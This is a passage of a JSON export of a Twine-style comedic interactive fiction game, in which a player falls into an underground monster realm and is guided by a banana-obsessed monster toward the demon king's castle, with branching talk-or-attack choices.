"cleanText": "After a bit of a walk, just enough to realize you never had breakfast, you make it to the cave entrance. You see your friend waving. He is slightly taller than you with silver eyes and dark hair.\nFriend: Hey sleepyhead! About time you rolled around! I was getting worried something bad had happened.\nYou: Like what?\nFriend: I don't know maybe your mom did something about your videogame addiction. Were you up late again?\nYou: Guilty.\nYour friend shrugs his shoulders and then motions to the cave entrance. \nFriend: Ready to tackle the cave? My dad always said something was special about this place. Almost as if the cave chose us to be here today rather than ourselves.\nYou: Ugh you're weirding me out come one let's get this over with."
},
{
"name": "Cave",
"tags": "",
"id": "5",
"text": "You walk into the cave with your friend behind you. The cave is dark and moist. The only light is from the entrance. After hearing your friend's shaky breathing you quickly realize he was hoping you wouldn't have came so he didn't have to go in. After surveying the area you see a faint glimmer in a corner and deeper into the cave their is a ledge.\n\n[[GLIMMER->Glimmer]]\n[[LEDGE->Ledge]]",
"links": [
{
"linkText": "GLIMMER",
"passageName": "Glimmer",
"original": "[[GLIMMER->Glimmer]]"
},
{
"linkText": "LEDGE",
"passageName": "Ledge",
"original": "[[LEDGE->Ledge]]"
}
],
"hooks": [],
"cleanText": "You walk into the cave with your friend behind you. The cave is dark and moist. The only light is from the entrance. After hearing your friend's shaky breathing you quickly realize he was hoping you wouldn't have came so he didn't have to go in. After surveying the area you see a faint glimmer in a corner and deeper into the cave their is a ledge."
},
{
"name": "Glimmer",
"tags": "",
"id": "6",
"text": "You inch closer to the glimmer and see a bottle! It has a note inside do you want to read it?\n\n[[READ->Note]]\n[[BACK->Cave1]]",
"links": [
{
"linkText": "READ",
"passageName": "Note",
"original": "[[READ->Note]]"
},
{
"linkText": "BACK",
"passageName": "Cave1",
"original": "[[BACK->Cave1]]"
}
],
"hooks": [],
"cleanText": "You inch closer to the glimmer and see a bottle! It has a note inside do you want to read it?"
},
{
"name": "Ledge",
"tags": "",
"id": "7",
"text": "You walk towards the ledge and notice there's a giant hole. You try to look deeper inside but see nothing, it's too dark. Maybe if you just got a little closer.... [This will end exploration of this area]\n\n[[BACK->Cave1]]\n[[APPROACH->EndOFLedge]]",
"links": [
{
"linkText": "BACK",
"passageName": "Cave1",
"original": "[[BACK->Cave1]]"
},
{
"linkText": "APPROACH",
"passageName": "EndOFLedge",
"original": "[[APPROACH->EndOFLedge]]"
}
],
"hooks": [],
"cleanText": "You walk towards the ledge and notice there's a giant hole. You try to look deeper inside but see nothing, it's too dark. Maybe if you just got a little closer.... [This will end exploration of this area]"
},
{
"name": "Note",
"tags": "",
"id": "8",
"text": "You unfurl the note from inside the bottle after taking it out.\nTo all who read this note: DO NOT GO ANY FURTHER. There is something weird about this cave. From the ledge I could hear talking from deep inside the cave and deep in the hole I could make out silhouettes of inhuman figures, some would call them monsters.\nFriend: OOOo spooky! Are you creeped out? Because I'm not. No sir, not me at all.\n\n[[BACK->Glimmer]]",
"links": [
{
"linkText": "BACK",
"passageName": "Glimmer",
"original": "[[BACK->Glimmer]]"
}
],
"hooks": [],
"cleanText": "You unfurl the note from inside the bottle after taking it out.\nTo all who read this note: DO NOT GO ANY FURTHER. There is something weird about this cave. From the ledge I could hear talking from deep inside the cave and deep in the hole I could make out silhouettes of inhuman figures, some would call them monsters.\nFriend: OOOo spooky! Are you creeped out? Because I'm not. No sir, not me at all."
},
{
"name": "Cave1",
"tags": "",
"id": "9",
"text": "Friend: You're not leaving yet are you? You are staying here and if you want to leave let me go first please. I gotta.... make sure it's safe.\n\n[[GLIMMER->Glimmer]]\n[[LEDGE->Ledge]]",
"links": [
{
"linkText": "GLIMMER",
"passageName": "Glimmer",
"original": "[[GLIMMER->Glimmer]]"
},
{
"linkText": "LEDGE",
"passageName": "Ledge",
"original": "[[LEDGE->Ledge]]"
}
],
"hooks": [],
"cleanText": "Friend: You're not leaving yet are you? You are staying here and if you want to leave let me go first please. I gotta.... make sure it's safe."
},
{
"name": "EndOFLedge",
"tags": "",
"id": "10",
"text": "You peer over the ledge and look deeper and deeper into the hole. You notice two little jewel like glimmers shine and then-\nHUH?? They moved! \nFriend: Did you see that??\nUnknown: Want a closer look?\nAs soon as you hear that somewhat familiar but unidentifiable voice you also hear your friend let out a giant scream. He was pushed off the ledge.\nUnknown: H-hey! What are you doing here?\nYou also get pushed off by the mysterious figure.\n\n[[NEXT->BottomOfHole]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BottomOfHole",
"original": "[[NEXT->BottomOfHole]]"
}
],
"hooks": [],
"cleanText": "You peer over the ledge and look deeper and deeper into the hole. You notice two little jewel like glimmers shine and then-\nHUH?? They moved! \nFriend: Did you see that??\nUnknown: Want a closer look?\nAs soon as you hear that somewhat familiar but unidentifiable voice you also hear your friend let out a giant scream. He was pushed off the ledge.\nUnknown: H-hey! What are you doing here?\nYou also get pushed off by the mysterious figure."
},
{
"name": "BottomOfHole",
"tags": "",
"id": "11",
"text": "???: Hey bud are you ok?\nYou slowly get up. You look beneath your feet and see a patch of flowers blocked your fall. upon examining your surroundings you see a dark figure.\n???: You can talk right?\nThe dark figure gets closer and you finally can identify it. It's a monster! Scaly and blue with horns! Yellow glowing eyes peer into your soul. What are you going to do?\n\n[[ATTACK->BottomOfHoleAttack]]\n[[TALK->BottomOfHoleTalk]]",
"links": [
{
"linkText": "ATTACK",
"passageName": "BottomOfHoleAttack",
"original": "[[ATTACK->BottomOfHoleAttack]]"
},
{
"linkText": "TALK",
"passageName": "BottomOfHoleTalk",
"original": "[[TALK->BottomOfHoleTalk]]"
}
],
"hooks": [],
"cleanText": "???: Hey bud are you ok?\nYou slowly get up. You look beneath your feet and see a patch of flowers blocked your fall. upon examining your surroundings you see a dark figure.\n???: You can talk right?\nThe dark figure gets closer and you finally can identify it. It's a monster! Scaly and blue with horns! Yellow glowing eyes peer into your soul. What are you going to do?"
},
{
"name": "BottomOfHoleAttack",
"tags": "",
"id": "12",
"text": "You throw a swift punch and knock the monster to the ground.\n???: Nice t-to m-meet you too pal.\nThe monster slowly gets up using it's long sharp claws.\n???: I just want to talk.\nYou think about it for a second and decide it would be too socially awkward to run away because he's such a nice guy.\nWilbur: I'm Wilber. I've already met your sidehook but I want to know more about you like your name.\nYou tell Wilbur your name and he steps back and thinks for a second.\nWilbur: I'll call you Slippy after my brother's favorite videogame character and that sick barrel roll you did off the ledge up there!\n\n[[NEXT->BottomOfHole1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BottomOfHole1",
"original": "[[NEXT->BottomOfHole1]]"
}
],
"hooks": [],
"cleanText": "You throw a swift punch and knock the monster to the ground.\n???: Nice t-to m-meet you too pal.\nThe monster slowly gets up using it's long sharp claws.\n???: I just want to talk.\nYou think about it for a second and decide it would be too socially awkward to run away because he's such a nice guy.\nWilbur: I'm Wilber. I've already met your sidehook but I want to know more about you like your name.\nYou tell Wilbur your name and he steps back and thinks for a second.\nWilbur: I'll call you Slippy after my brother's favorite videogame character and that sick barrel roll you did off the ledge up there!"
},
{
"name": "BottomOfHoleTalk",
"tags": "",
"id": "13",
"text": "You: H-hi\n???: Do you have a lot of friends in school? You don't seem very extroverted.\nYou: I fell off the ledge.\n???: I'm near sighted, but I'm not blind you fell right in front of me. Where are my manners??\nYou: I don't know did you check your pockets?\nHe gives you a weird look because your pun wasn't funny and you kinda regret not punching him.\nWilbur: My name's Wilbur. We'll work on whatever that was. Anyways, how does the name Slippy sound? I got my inspiration from that sick barrel roll you did down the slope.\n\n[[NEXT->BottomOfHole1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BottomOfHole1",
"original": "[[NEXT->BottomOfHole1]]"
}
],
"hooks": [],
"cleanText": "You: H-hi\n???: Do you have a lot of friends in school? You don't seem very extroverted.\nYou: I fell off the ledge.\n???: I'm near sighted, but I'm not blind you fell right in front of me. Where are my manners??\nYou: I don't know did you check your pockets?\nHe gives you a weird look because your pun wasn't funny and you kinda regret not punching him.\nWilbur: My name's Wilbur. We'll work on whatever that was. Anyways, how does the name Slippy sound? I got my inspiration from that sick barrel roll you did down the slope."
},
{
"name": "BottomOfHole1",
"tags": "",
"id": "14",
"text": "-Slippy-\nYou slowly collect your thoughts and you remember everything.\nYou: Wait! Did anyone else fall down here?\nWilbur: Nope, just you Slippy\nYou: I was with a friend of mine and we fell down the hole. I guess we fell down different passages.\nWilbur: I should've known you came from above ground since you are a human. We look so different.\nYou examine his scaly body noting his tail and claws and horns and glowing yellow eyes. They remind you of what you saw when you peered into the hole. \nWilbur: I'm afraid there's only one way back up. Through the demon king's castle.\nYou: D-demon king??\nWilbur: Oh he's a total softy. He doesn't take too kindly to humans though so I guess your fear is justified.\n\n[[NEXT->BottomOfHole2]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BottomOfHole2",
"original": "[[NEXT->BottomOfHole2]]"
}
],
"hooks": [],
"cleanText": "-Slippy-\nYou slowly collect your thoughts and you remember everything.\nYou: Wait! Did anyone else fall down here?\nWilbur: Nope, just you Slippy\nYou: I was with a friend of mine and we fell down the hole. I guess we fell down different passages.\nWilbur: I should've known you came from above ground since you are a human. We look so different.\nYou examine his scaly body noting his tail and claws and horns and glowing yellow eyes. They remind you of what you saw when you peered into the hole. \nWilbur: I'm afraid there's only one way back up. Through the demon king's castle.\nYou: D-demon king??\nWilbur: Oh he's a total softy. He doesn't take too kindly to humans though so I guess your fear is justified."
},
{
"name": "BottomOfHole2",
"tags": "",
"id": "15",
"text": "Wilbur: I can tell this is a lot to process but I'll help you out I made a promise to an old friend that I would help little guys like you. I'll teach you how to survive out here. \nYou breath a sigh of relief. All you need now is to find your friend and Wilbur will help you guys out.\nWilbur: My first bit of advice is this. Even though I'm a nice guy, others don't share my views. Whether you CHOOSE to fight off these types of monsters or befriend them is up to you, just remember, your choices have consequences. Now come on don't be shy I'm your official tour guide to the realm of monsters!\n\n[[NEXT->MushroomForest]]",
"links": [
{
"linkText": "NEXT",
"passageName": "MushroomForest",
"original": "[[NEXT->MushroomForest]]"
}
],
"hooks": [],
"cleanText": "Wilbur: I can tell this is a lot to process but I'll help you out I made a promise to an old friend that I would help little guys like you. I'll teach you how to survive out here. \nYou breath a sigh of relief. All you need now is to find your friend and Wilbur will help you guys out.\nWilbur: My first bit of advice is this. Even though I'm a nice guy, others don't share my views. Whether you CHOOSE to fight off these types of monsters or befriend them is up to you, just remember, your choices have consequences. Now come on don't be shy I'm your official tour guide to the realm of monsters!"
},
{
"name": "MushroomForest",
"tags": "",
"id": "16",
"text": "You follow Wilbur though some tight fitting caves and pop out of a huge expanse. It's a forrest but instead of trees it's... mushrooms? I guess it is still a cave after all but taking a deep breath in it feels like fresh air.\nWilbur: This is Mushroom Forrest! If you wanna see my house we can go down that path or if you hate sidequests and fun, we can go straight ahead.\n\n[[PATH->House]]\n[[STRAIGHT->MushroomForestExit]]",
"links": [
{
"linkText": "PATH",
"passageName": "House",
"original": "[[PATH->House]]"
},
{
"linkText": "STRAIGHT",
"passageName": "MushroomForestExit",
"original": "[[STRAIGHT->MushroomForestExit]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur though some tight fitting caves and pop out of a huge expanse. It's a forrest but instead of trees it's... mushrooms? I guess it is still a cave after all but taking a deep breath in it feels like fresh air.\nWilbur: This is Mushroom Forrest! If you wanna see my house we can go down that path or if you hate sidequests and fun, we can go straight ahead."
},
{
"name": "House",
"tags": "",
"id": "17",
"text": "You walk down the path and approach a log-uh I mean mushroom..? cabin. Wilbur skips up to the door and knocks comically loud and fast. You hear a mysterious unknown voice scream at the top of it's lungs.\nWilbur: Uh oh gotta go.\nHe quickly opens the door which apparently was unlocked and he runs inside. You can't chase him fast enough and end up alone in his living room.\n\n[[NEXT->HouseLiving]]",
"links": [
{
"linkText": "NEXT",
"passageName": "HouseLiving",
"original": "[[NEXT->HouseLiving]]"
}
],
"hooks": [],
"cleanText": "You walk down the path and approach a log-uh I mean mushroom..? cabin. Wilbur skips up to the door and knocks comically loud and fast. You hear a mysterious unknown voice scream at the top of it's lungs.\nWilbur: Uh oh gotta go.\nHe quickly opens the door which apparently was unlocked and he runs inside. You can't chase him fast enough and end up alone in his living room."
},
{
"name": "HouseLiving",
"tags": "",
"id": "18",
"text": "You see a kitchen/dining room to your front and on the side there are 2 doors. One is slightly ajar to the right and the other to the left has a bunch of signs that say no entry and a-what is that?-banana..? nailed to the door. \n\n[[KITCHEN->Kitchen]]\n[[RIGHT->OrvilleRoom]]\n[[LEFT->Knock]]",
"links": [
{
"linkText": "KITCHEN",
"passageName": "Kitchen",
"original": "[[KITCHEN->Kitchen]]"
},
{
"linkText": "RIGHT",
"passageName": "OrvilleRoom",
"original": "[[RIGHT->OrvilleRoom]]"
},
{
"linkText": "LEFT",
"passageName": "Knock",
"original": "[[LEFT->Knock]]"
}
],
"hooks": [],
"cleanText": "You see a kitchen/dining room to your front and on the side there are 2 doors. One is slightly ajar to the right and the other to the left has a bunch of signs that say no entry and a-what is that?-banana..? nailed to the door."
},
{
"name": "Kitchen",
"tags": "",
"id": "19",
"text": "You walk into the kitchen/dining room area and immediately spot a bunch of bananas on the counter and table. Only heaven knows what's in the fridge, probably more bananas. Maybe check out what's in that room with the open door?\n\n[[BACK->HouseLiving]]",
"links": [
{
"linkText": "BACK",
"passageName": "HouseLiving",
"original": "[[BACK->HouseLiving]]"
}
],
"hooks": [],
"cleanText": "You walk into the kitchen/dining room area and immediately spot a bunch of bananas on the counter and table. Only heaven knows what's in the fridge, probably more bananas. Maybe check out what's in that room with the open door?"
},
{
"name": "OrvilleRoom",
"tags": "",
"id": "20",
"text": "You slowly appraoch the open door and see a shadowy figure inside. You walk into the room and before you can introduce yourself, the shadowy figure lunges at you.\n???: I'll kill you!\nYou let out a scream and before you can have your life flash before your eyes the figure stops.\n???: Ew. What are you cosplaying as, a human?\nYou: Uh, I am a human?\nThe figure stares at you in horror. While he is in shock you examine him and realize he looks very similar to Wilbur taller and red. This must be his brother.\nWilbur: Hey Orville, this is my new friend.\nOrville: YOU BROUGHT A HUMAN HOME?\nWibur: Well technically he chose to come here of his own volition so I followed him while walking in front of him.\n\n[[NEXT->OrvilleRoom1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "OrvilleRoom1",
"original": "[[NEXT->OrvilleRoom1]]"
}
],
"hooks": [],
"cleanText": "You slowly appraoch the open door and see a shadowy figure inside. You walk into the room and before you can introduce yourself, the shadowy figure lunges at you.\n???: I'll kill you!\nYou let out a scream and before you can have your life flash before your eyes the figure stops.\n???: Ew. What are you cosplaying as, a human?\nYou: Uh, I am a human?\nThe figure stares at you in horror. While he is in shock you examine him and realize he looks very similar to Wilbur taller and red. This must be his brother.\nWilbur: Hey Orville, this is my new friend.\nOrville: YOU BROUGHT A HUMAN HOME?\nWibur: Well technically he chose to come here of his own volition so I followed him while walking in front of him."
},
{
"name": "Knock",
"tags": "",
"id": "21",
"text": "You knock on the door carefully avoiding the banana and you hear a lot of fumbling around but inevitably no one answers. You roll your eyes as you realize this is Wilbur's room and he's probably cleaning it because he didn't expect you to try this sidequest.\n\n[[BACK->HouseLiving]]",
"links": [
{
"linkText": "BACK",
"passageName": "HouseLiving",
"original": "[[BACK->HouseLiving]]"
}
],
"hooks": [],
"cleanText": "You knock on the door carefully avoiding the banana and you hear a lot of fumbling around but inevitably no one answers. You roll your eyes as you realize this is Wilbur's room and he's probably cleaning it because he didn't expect you to try this sidequest."
},
{
"name": "OrvilleRoom1",
"tags": "",
"id": "22",
"text": "Orville: I'm going to throw up. The demon king is going to kill us.\nWilbur: Nah he's a big softy. Well except to humans so I guess your fear is justified.\nYou roll your eyes as you figure out just exactly what it means to be a human in a monster's world.\nOrville: What do you even plan to do with him? He sticks out like a sore thumb.\nWilbur: I was looking for my banana costume but SOMEONE took it.\nYou: How many bananas do you have?\nWilbur: There was a sale at the banana store, I couldn't resist.\nOrville: Did you check in your closet?\nWilbur: No? That's where I keep all my banana-related clothing, why would it be in there.\nYou let out a light chuckle and when Wilbur gives you another weird look like before and you realize he was being serious.\nWilbur: Also I'm taking him to the demon king to let him back to human world.\nOrville grows pale. \nOrville: No, I'm gonna report him. We can't risk this again you are lucky you came away with your head when you-know-what happened.\nWilbur: Plllllllleeeeeaaaasssseee. I'll give you a banana if you don't.\nYou look around as Orville reaches for his phone. You spot a sword and realize this is your moment. You can attack him or try to convince him to not report you. What will you do?\n\n[[TALK->OrvilleRoomTalk]]\n[[ATTACK->OrvilleRoomAttack]]",
"links": [
{
"linkText": "TALK",
"passageName": "OrvilleRoomTalk",
"original": "[[TALK->OrvilleRoomTalk]]"
},
{
"linkText": "ATTACK",
"passageName": "OrvilleRoomAttack",
"original": "[[ATTACK->OrvilleRoomAttack]]"
}
],
"hooks": [],
"cleanText": "Orville: I'm going to throw up. The demon king is going to kill us.\nWilbur: Nah he's a big softy. Well except to humans so I guess your fear is justified.\nYou roll your eyes as you figure out just exactly what it means to be a human in a monster's world.\nOrville: What do you even plan to do with him? He sticks out like a sore thumb.\nWilbur: I was looking for my banana costume but SOMEONE took it.\nYou: How many bananas do you have?\nWilbur: There was a sale at the banana store, I couldn't resist.\nOrville: Did you check in your closet?\nWilbur: No? That's where I keep all my banana-related clothing, why would it be in there.\nYou let out a light chuckle and when Wilbur gives you another weird look like before and you realize he was being serious.\nWilbur: Also I'm taking him to the demon king to let him back to human world.\nOrville grows pale. \nOrville: No, I'm gonna report him. We can't risk this again you are lucky you came away with your head when you-know-what happened.\nWilbur: Plllllllleeeeeaaaasssseee. I'll give you a banana if you don't.\nYou look around as Orville reaches for his phone. You spot a sword and realize this is your moment. You can attack him or try to convince him to not report you. What will you do?"
},
{
"name": "OrvilleRoomTalk",
"tags": "",
"id": "23",
"score": 10,
"text": "You: Please don't report me!\nOrville pasuses. \nOrville: Why?\nYou: I uh, didn't think I'd get this far.\nEveryone is confused as you let out an embarrassing chuckle.\nWilbur: I made a promise to help Slippy so I will.\nOrville: You named it??\nOrville sighs and sits next to a pile of swords.\nWilbur: Come one bro, all you have to do is sit here and keep practicing for the royal guard. My actions don't effect you we're monsters, not humans.\nYou feel slightly insulted now but relieved as talking seems to have worked.\nWilbur: Come on slippy, let's get you home.\nOrville: You better come home tonight!\nAs Wilbur motions you to leave he hugs Orville and whispers something to him. I think it's time to leave.\n\n[[BACK->HouseLeave]]",
"links": [
{
"linkText": "BACK",
"passageName": "HouseLeave",
"original": "[[BACK->HouseLeave]]"
}
],
"hooks": [],
"cleanText": "You: Please don't report me!\nOrville pasuses. \nOrville: Why?\nYou: I uh, didn't think I'd get this far.\nEveryone is confused as you let out an embarrassing chuckle.\nWilbur: I made a promise to help Slippy so I will.\nOrville: You named it??\nOrville sighs and sits next to a pile of swords.\nWilbur: Come one bro, all you have to do is sit here and keep practicing for the royal guard. My actions don't effect you we're monsters, not humans.\nYou feel slightly insulted now but relieved as talking seems to have worked.\nWilbur: Come on slippy, let's get you home.\nOrville: You better come home tonight!\nAs Wilbur motions you to leave he hugs Orville and whispers something to him. I think it's time to leave."
},
{
"name": "OrvilleRoomAttack",
"tags": "",
"id": "24",
"score": -10,
"text": "You grab the sword and lunge at Orville as he did you. This time, however, you didn't stop. As you swing Orville vanishes out of thin air. Is this how monsters die?\nWilbur: Why did you do that?\nYou: I had to! He was gonna report me!\nWilbur sighs and motions you to follow him.\nWilbur: Come on Slippy, we need to go.\nIt's almost frustrating how little he cares about his own brother to just walk away like that.\nWilbur: Must one of those kinda runs.\n\n[[FOLLOW->MushroomForestExitEvil]]",
"links": [
{
"linkText": "FOLLOW",
"passageName": "MushroomForestExitEvil",
"original": "[[FOLLOW->MushroomForestExitEvil]]"
}
],
"hooks": [],
"cleanText": "You grab the sword and lunge at Orville as he did you. This time, however, you didn't stop. As you swing Orville vanishes out of thin air. Is this how monsters die?\nWilbur: Why did you do that?\nYou: I had to! He was gonna report me!\nWilbur sighs and motions you to follow him.\nWilbur: Come on Slippy, we need to go.\nIt's almost frustrating how little he cares about his own brother to just walk away like that.\nWilbur: Must one of those kinda runs."
},
{
"name": "MushroomForestExitEvil",
"tags": "",
"id": "25",
"text": "You and Wilbur share a quiet tense walk over to the next destination. You look ahead and notice a gate.\nWilbur: 2,000 years ago, humans and monsters lived together. Monsters have certain qualities that humans find repulsive and the monsters that humans couldn't tame like dogs simply got thrown into this prison. Ever since then the royal family keeps all monsters in here lest the humans return to exact their revenge.\nYou think for a moment as you desperately want to show him humans aren't all like that but you are more of a monster than him.\nWilbur: I guess I understand why now.\nYou: You don't have to help me.\nWilbur gets frustrated.\nWilbur: Yes I do, I made a promise.\n\n[[NEXT->CastleGatesEvil]]",
"links": [
{
"linkText": "NEXT",
"passageName": "CastleGatesEvil",
"original": "[[NEXT->CastleGatesEvil]]"
}
],
"hooks": [],
"cleanText": "You and Wilbur share a quiet tense walk over to the next destination. You look ahead and notice a gate.\nWilbur: 2,000 years ago, humans and monsters lived together. Monsters have certain qualities that humans find repulsive and the monsters that humans couldn't tame like dogs simply got thrown into this prison. Ever since then the royal family keeps all monsters in here lest the humans return to exact their revenge.\nYou think for a moment as you desperately want to show him humans aren't all like that but you are more of a monster than him.\nWilbur: I guess I understand why now.\nYou: You don't have to help me.\nWilbur gets frustrated.\nWilbur: Yes I do, I made a promise."
},
{
"name": "HouseLeave",
"tags": "",
"id": "26",
"text": "You follow Wilbur out of the house and wave bye to Orville who is smiling and waving back. I think you made a friend.\nWilbur: How was that little sidequest? Fun right? Let's go back on the path to the castle.\n\n[[NEXT->MushroomForestExit]]",
"links": [
{
"linkText": "NEXT",
"passageName": "MushroomForestExit",
"original": "[[NEXT->MushroomForestExit]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur out of the house and wave bye to Orville who is smiling and waving back. I think you made a friend.\nWilbur: How was that little sidequest? Fun right? Let's go back on the path to the castle."
},
{
"name": "MushroomForestExit",
"tags": "",
"id": "27",
"text": "You go straight through the forest and after a bit of walking you see large gates.\nWilbur: These are the castle gates. There's a town and then inside the castle there is a staircase that leads straight to the human world.\nYou: Maybe I can show you my world and my house!\nWilbur: Heh I wish. Everyone knows monsters were banished to this underground world. \nYou: What?\nWilbur: 2,000 years ago, humans and monsters lived together. Monsters have certain qualities that humans find repulsive and the monsters that humans couldn't tame like dogs simply got thrown into this prison. Ever since then the royal family keeps all monsters in here lest the humans return to exact their revenge. You don't seem so bad though.\nYou: That's crazy I never knew any of that?\nWilbur: That surprising. Maybe that's why Harry got out so easily.\nYou: Harry?\nWilbur: Oh yea he was this real tall monkey looking like creature, he had huge feet.\nYou: Bigfoot?\nWilbur: hehe that's what we called him in gradeschool how did you know?\nYou: Just uh guessing...\n\n[[NEXT->CastleGates]]",
"links": [
{
"linkText": "NEXT",
"passageName": "CastleGates",
"original": "[[NEXT->CastleGates]]"
}
],
"hooks": [],
"cleanText": "You go straight through the forest and after a bit of walking you see large gates.\nWilbur: These are the castle gates. There's a town and then inside the castle there is a staircase that leads straight to the human world.\nYou: Maybe I can show you my world and my house!\nWilbur: Heh I wish. Everyone knows monsters were banished to this underground world. \nYou: What?\nWilbur: 2,000 years ago, humans and monsters lived together. Monsters have certain qualities that humans find repulsive and the monsters that humans couldn't tame like dogs simply got thrown into this prison. Ever since then the royal family keeps all monsters in here lest the humans return to exact their revenge. You don't seem so bad though.\nYou: That's crazy I never knew any of that?\nWilbur: That surprising. Maybe that's why Harry got out so easily.\nYou: Harry?\nWilbur: Oh yea he was this real tall monkey looking like creature, he had huge feet.\nYou: Bigfoot?\nWilbur: hehe that's what we called him in gradeschool how did you know?\nYou: Just uh guessing..."
},
{
"name": "CastleGates",
"tags": "",
"id": "28",
"text": "You walk through 2 large doors and walk into a town with all different kinds of monsters. Some large and hairy and others small and slimy. A parade of skeletons dances by and before you can question how that's even possible Wilbur darts past you.\nWilbur: They're having a banana sale at the banana store!\nYou let out a sigh and wonder how many more times this will happen. You see a grandious door which is being guarded by a rather large goblin. You contemplate waiting for Wilbur but he looks pretty absorbed in the bananas because he's a bad guide. You are a decent guy why not try mingling with the skeletons?\n\n[[BANANA->BananaStore]]\n[[GOBLIN->Door]]\n[[TALK->Skeleton]]",
"links": [
{
"linkText": "BANANA",
"passageName": "BananaStore",
"original": "[[BANANA->BananaStore]]"
},
{
"linkText": "GOBLIN",
"passageName": "Door",
"original": "[[GOBLIN->Door]]"
},
{
"linkText": "TALK",
"passageName": "Skeleton",
"original": "[[TALK->Skeleton]]"
}
],
"hooks": [],
"cleanText": "You walk through 2 large doors and walk into a town with all different kinds of monsters. Some large and hairy and others small and slimy. A parade of skeletons dances by and before you can question how that's even possible Wilbur darts past you.\nWilbur: They're having a banana sale at the banana store!\nYou let out a sigh and wonder how many more times this will happen. You see a grandious door which is being guarded by a rather large goblin. You contemplate waiting for Wilbur but he looks pretty absorbed in the bananas because he's a bad guide. You are a decent guy why not try mingling with the skeletons?"
},
{
"name": "CastleGatesEvil",
"tags": "",
"id": "29",
"text": "You walk through two huge gates. It's a ghost town. Not a single person. You breath a sigh of relief as you don't want to have to kill more monsters.\nWilbur: Here we are Slippy. Why don't you explore for a little bit. I'll wait for you by the castle gates.\n\n[[NEXT->Town]]",
"links": [
{
"linkText": "NEXT",
"passageName": "Town",
"original": "[[NEXT->Town]]"
}
],
"hooks": [],
"cleanText": "You walk through two huge gates. It's a ghost town. Not a single person. You breath a sigh of relief as you don't want to have to kill more monsters.\nWilbur: Here we are Slippy. Why don't you explore for a little bit. I'll wait for you by the castle gates."
},
{
"name": "BananaStore",
"tags": "",
"id": "30",
"text": "You approach the banana store and peer inside. Wilbur has more bananas than he can hold. He's gonna be there for awhile.\n\n[[BACK->CastleGate1]]",
"links": [
{
"linkText": "BACK",
"passageName": "CastleGate1",
"original": "[[BACK->CastleGate1]]"
}
],
"hooks": [],
"cleanText": "You approach the banana store and peer inside. Wilbur has more bananas than he can hold. He's gonna be there for awhile."
},
{
"name": "Door",
"tags": "",
"id": "31",
"text": "You approach the door and the large goblin steps forward.\nGoblin: What business do you have here?\nYou: I wish to speak to the demon king.\nGoblin: Hehe you must have a deathwish to see him dressed as a human.\nYou: I am a human.\nThe Goblin stands there in awe for a second.\nGoblin: Ok so I'm gonna radio my supervisor I'm not sure how to handle this kind of situation.\nYou: By all means, I would hate to make you job harder.\nYou and the goblin exchange an awkward forced smile as he walks off to get his radio.\n\n[[NEXT->Door1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "Door1",
"original": "[[NEXT->Door1]]"
}
],
"hooks": [],
"cleanText": "You approach the door and the large goblin steps forward.\nGoblin: What business do you have here?\nYou: I wish to speak to the demon king.\nGoblin: Hehe you must have a deathwish to see him dressed as a human.\nYou: I am a human.\nThe Goblin stands there in awe for a second.\nGoblin: Ok so I'm gonna radio my supervisor I'm not sure how to handle this kind of situation.\nYou: By all means, I would hate to make you job harder.\nYou and the goblin exchange an awkward forced smile as he walks off to get his radio."
},
{
"name": "Skeleton",
"tags": "",
"id": "32",
"text": "You approach the skeletons.\nYou: Did you know skeletons get extremely lonely becuase they have no body?\nThe skeletons look at eachother and whisper a bit and look back at you angry.\nSkeleton 1: That's really messed up dude.\nSkeleton 2: Yea where are your friends meatbag??\nSkeleton 3: What a jerk dude. Now I don't want to go to the bonequet.\nSkeleton 1: Don't mind him amigo, he probably has some sort of bone deformity to make him look like that.\nYou feel more insulted than them but because you were the aggressor you sulk away.\n\n[[BACK->CastleGate1]]",
"links": [
{
"linkText": "BACK",
"passageName": "CastleGate1",
"original": "[[BACK->CastleGate1]]"
}
],
"hooks": [],
"cleanText": "You approach the skeletons.\nYou: Did you know skeletons get extremely lonely becuase they have no body?\nThe skeletons look at eachother and whisper a bit and look back at you angry.\nSkeleton 1: That's really messed up dude.\nSkeleton 2: Yea where are your friends meatbag??\nSkeleton 3: What a jerk dude. Now I don't want to go to the bonequet.\nSkeleton 1: Don't mind him amigo, he probably has some sort of bone deformity to make him look like that.\nYou feel more insulted than them but because you were the aggressor you sulk away."
},
{
"name": "CastleGate1",
"tags": "",
"id": "33",
"text": "Banana store, gate guarded by a goblin, or mingle with the skeletons?\n\n[[BANANA->BananaStore]]\n[[GOBLIN->Door]]\n[[TALK->Skeleton]]",
"links": [
{
"linkText": "BANANA",
"passageName": "BananaStore",
"original": "[[BANANA->BananaStore]]"
},
{
"linkText": "GOBLIN",
"passageName": "Door",
"original": "[[GOBLIN->Door]]"
},
{
"linkText": "TALK",
"passageName": "Skeleton",
"original": "[[TALK->Skeleton]]"
}
],
"hooks": [],
"cleanText": "Banana store, gate guarded by a goblin, or mingle with the skeletons?"
},
{
"name": "Door1",
"tags": "",
"id": "34",
"text": "After awhile the goblin lumbers back.\nGoblin: Ok so I talked to my manager and I have to kill you.\nYou: Ah ok understandable- Wait what??\nGoblin: Sorry, company policy. You seem like a nice guy but I have a real shot at grunt manager and this will really boost my chances.\nYou: Please don't hurt me!\nGoblin: Wow you really are a human. Us goblins are really weak, we attack in gameshow trivia. If you lose you die.\nYou: Why do you guard doors then?\nGoblin: Listen pal, I don't make the rules. Get ready for Jeopardy!\n\n[[NEXT->Question1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "Question1",
"original": "[[NEXT->Question1]]"
}
],
"hooks": [],
"cleanText": "After awhile the goblin lumbers back.\nGoblin: Ok so I talked to my manager and I have to kill you.\nYou: Ah ok understandable- Wait what??\nGoblin: Sorry, company policy. You seem like a nice guy but I have a real shot at grunt manager and this will really boost my chances.\nYou: Please don't hurt me!\nGoblin: Wow you really are a human. Us goblins are really weak, we attack in gameshow trivia. If you lose you die.\nYou: Why do you guard doors then?\nGoblin: Listen pal, I don't make the rules. Get ready for Jeopardy!"
},
{
"name": "Question1",
"tags": "",
"id": "35",
